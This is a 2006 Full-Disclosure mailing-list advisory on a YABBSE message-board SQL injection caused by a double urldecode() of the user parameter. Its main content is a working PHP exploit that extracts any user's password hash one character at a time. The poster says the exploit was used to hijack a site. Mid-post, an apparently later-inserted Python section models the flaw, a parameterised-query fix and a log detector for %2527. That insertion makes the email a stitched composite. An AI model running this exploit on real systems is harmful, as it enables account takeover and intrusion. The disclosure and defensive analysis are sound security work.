List: full-disclosure
Subject: [Full-disclosure] NDSD-06-001
From: "Sam Thomas" <Sam.Thomas () aquaterra ! org>
Date: 2006-06-23 0:43:50
Message-ID: 2438A048A42E974E954C41696816D4893F991C () exchange ! aquaterra ! org
Hey str0ke - Are you the same str0ke whose code I've been ripping? Damn, I guess I better release my first N3td3v Sponsoring Disclosure.....
NDSD-06-001: YABBSE SQL Injection
June 23, 2006
-- Sponsored post
http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046903.html
-- Affected Vendor:
The YABB SE Team
-- Affected Products:
YABBSE (This product is discontinued, but unfortunately still seems to be in mainstream use)
-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary SQL on vulnerable installations of the YABBSE message board.
The specific flaw exists within the "profile.php" php script which is used to give access to user profiles.
-- Vendor Response:
The vendor for this product essentially no longer exists. It is recommended that you move to a supported message board.
-- Disclosure Timeline:
2005.06.26 - Vulnerability Discovered
2005.06.27 - Vendor found to have discontinued support
2006.06.23 - Public release of advisory
-- Vulnerability
The vulnerability exists where the user-supplied variable $user is processed by the urldecode() function twice; this allows for the %2527 (decodes to %27, which decodes to ') SQL injection technique.
- Exploit
The following PoC exploit can be used to retrieve any user's (i.e. admin) password hash, which in turn can be used to imitate and log in as that user:
**BEGIN PoC Code
<?php
/*
yabbse exploit
all versions - product discontinued
most of the code ripped from http://www.milw0rm.com/exploits/1036 so credit to str0ke and
milkw0rm
*/
$server = "www.uberhacker.com";
$user = "Dozix007";
$port = 80;
$hash = "";
$hex = "0123456789abcdef";
/* Recover the 32-character MD5 hash one position at a time: for each position,
   try every hex digit until the board stops answering with its error page. */
for ($i = 1; $i <= 32; $i++) {
$idx = 0;
$found = false;
while (!($found)) {
$letter = substr($hex, $idx, 1);
/* %2527 translates to %27, which gets past magic quotes. This is
translated to ' by urldecode. */
$url = "/cgi-pbin/board/index.php?board=;action=viewprofile;user=$user%2527+AND+mid(passwd,$i,1)=%2527" . $letter;
$header = getHeader($server, $port, $url, "");
if (!preg_match("/An Error Has Occurred/", $header)) {
echo $i . ": " . $letter . "\n";
$found = true;
$hash .= $letter;
} else {
$idx++;
}
}
}
echo "\n\nFinal Hash: $hash\n";
/* Send a bare GET request and return the raw response up to the end of the headers. */
function getHeader($server, $port, $file, $cookie) {
$ip = gethostbyname($server);
$fp = fsockopen($ip, $port);
if (!$fp) {
return "Unknown";
} else {
$com = "GET $file HTTP/1.1\r\n";
$com .= "Host: $server:$port\r\n";
$com .= "Connection: close\r\n";
$com .= "\r\n";
fputs($fp, $com);
$header = "";
do {
$header .= fread($fp, 512);
/* stop at the blank line ending the headers, or if the server closes early */
} while (!preg_match('/\r\n\r\n$/', $header) && !feof($fp));
fclose($fp);
}
return $header;
}
?>
// jazzy2fives 2005-07-26 - mostly stolen from milw0rm.com [2005-06-08]
** End PoC Code
-- Patch
It is recommended that if you insist on continuing the use of this product, you remove the line which reads "$user = urldecode($user);" from all functions in "\sources\profile.php"
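To make the double-decoding bug and the patch above concrete, here is an added example that is not part of the advisory and not YABBSE code. It models, in Python over an in-memory SQLite table, the three decoding stages the advisory describes (PHP populating $_GET, magic_quotes_gpc escaping, then the script's own extra urldecode()), shows that the hardened path (decode once, bind the value) no longer behaves as a boolean oracle, and adds a small access-log check for the %2527 signature. The table schema, the user "Dozix007" from the PoC, the hash value, the log lines and the use of SQLite substr() in place of MySQL mid() are all constructed assumptions.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed stand-in for the board's member table. The column names `user` and
# `passwd` follow the advisory's PoC query; the schema and the hash are invented.
SAMPLE_HASH = "0123456789abcdef0123456789abcdef"


def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (user TEXT, passwd TEXT)")
    db.execute("INSERT INTO members VALUES (?, ?)", ("Dozix007", SAMPLE_HASH))
    return db


def php_addslashes(s):
    """Python model of PHP addslashes(), i.e. what magic_quotes_gpc did to $_GET."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def vulnerable_lookup(db, raw_user):
    """Model of the original profile.php flow: PHP decodes the query string once,
    magic quotes escape whatever quotes exist at that point, and then the script
    calls urldecode() a second time, producing an unescaped quote."""
    user = unquote_plus(raw_user)     # PHP populating $_GET: %2527 -> %27
    user = php_addslashes(user)       # magic_quotes_gpc: no quote present yet
    user = unquote_plus(user)         # the extra urldecode(): %27 -> ' (unescaped)
    sql = f"SELECT passwd FROM members WHERE user='{user}'"
    return [row[0] for row in db.execute(sql)]


def hardened_lookup(db, raw_user):
    """Patched flow: decode once (as PHP already does) and bind the value
    instead of splicing it into the SQL string."""
    user = unquote_plus(raw_user)
    rows = db.execute("SELECT passwd FROM members WHERE user=?", (user,))
    return [row[0] for row in rows]


# Constructed probe in the shape of the advisory's PoC query; substr() stands in
# for MySQL mid() because this model runs on SQLite.
PROBE = "Dozix007%2527+AND+substr(passwd,1,1)=%2527{c}"


def oracle_answers(lookup, db, candidate):
    """True if `lookup` leaks whether the hash's first character is `candidate`.
    Used here to verify that the hardened path no longer leaks anything."""
    return bool(lookup(db, PROBE.format(c=candidate)))


# Detection: a double-encoded quote or backslash in the request target
# (%2527, %2522, %255c) is the signature of this bypass.
DOUBLE_ENCODED = re.compile(r"%25(?:27|22|5c)", re.IGNORECASE)


def flags_double_encoding(log_line):
    """Return True if a combined-format access-log line carries a double-encoded
    quote or backslash in its request target."""
    m = re.search(r'"(?:GET|POST|HEAD) (\S+)', log_line)
    return bool(m and DOUBLE_ENCODED.search(m.group(1)))


# Constructed access-log lines, not taken from any real server.
SAMPLE_LOG = [
    '10.0.0.5 - - [23/Jun/2006:00:43:50 +0000] '
    '"GET /board/index.php?board=;action=viewprofile;user=Dozix007 HTTP/1.1" 200 8123',
    '10.0.0.9 - - [23/Jun/2006:00:44:02 +0000] '
    '"GET /board/index.php?board=;action=viewprofile;'
    'user=Dozix007%2527+AND+substr(passwd,1,1)=%2527a HTTP/1.1" 200 8123',
]


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, probe '0':", oracle_answers(vulnerable_lookup, db, "0"))
    print("vulnerable, probe 'f':", oracle_answers(vulnerable_lookup, db, "f"))
    print("hardened,   probe '0':", oracle_answers(hardened_lookup, db, "0"))
    for line in SAMPLE_LOG:
        print("flagged" if flags_double_encoding(line) else "clean  ", line[:60])
```

The vulnerable path returns a row for the probe exactly when the guessed character matches, which is the yes/no answer the PoC loops over; the hardened path treats the whole once-decoded string as a literal username and returns nothing. Note that removing the second urldecode() alone, as the advisory suggests, closes this specific bypass but still leaves the query string-spliced; binding the value is what removes the injection class.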
-- Credit:
This vulnerability was discovered by me!
-- About N3td3v Sponsoring Disclosures:
Established by me, n3td3v sponsoring disclosures (NDSD) is a system established to reward n3td3v for his (her?) posts to full disclosure which bring me more amusement than any 0-day possibly could.
The NDSD is unique in how vulnerability information sponsors the incompetency of n3td3v: for each amusing n3td3v post NDSD will attempt to release a disclosure of a previously unknown lame exploit. This is because most valid complaints against n3td3v claim that (s/)he contributes nothing to the security community. The aim of NDSD is to sponsor n3td3v posts, thus ensuring that each directly corresponds to a positive contribution to FULL-DISCLOSURE.
-- Misc
For anyone interested, this was the exploit used to hijack www.uberhacker.com - a legal hacker training site, which had as its primary challenge to hijack the website. The site has since had the majority of its content removed.
NDSD is a subsidiary of empty vessels (www.emptyvessels.org.uk); one day we might get our website up.
***********************************************************************************
For more information about Aquaterra Leisure, see www.aquaterra.org
To shop for speedo or polar at bargain prices, see www.aquashop.org
***********************************************************************************
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/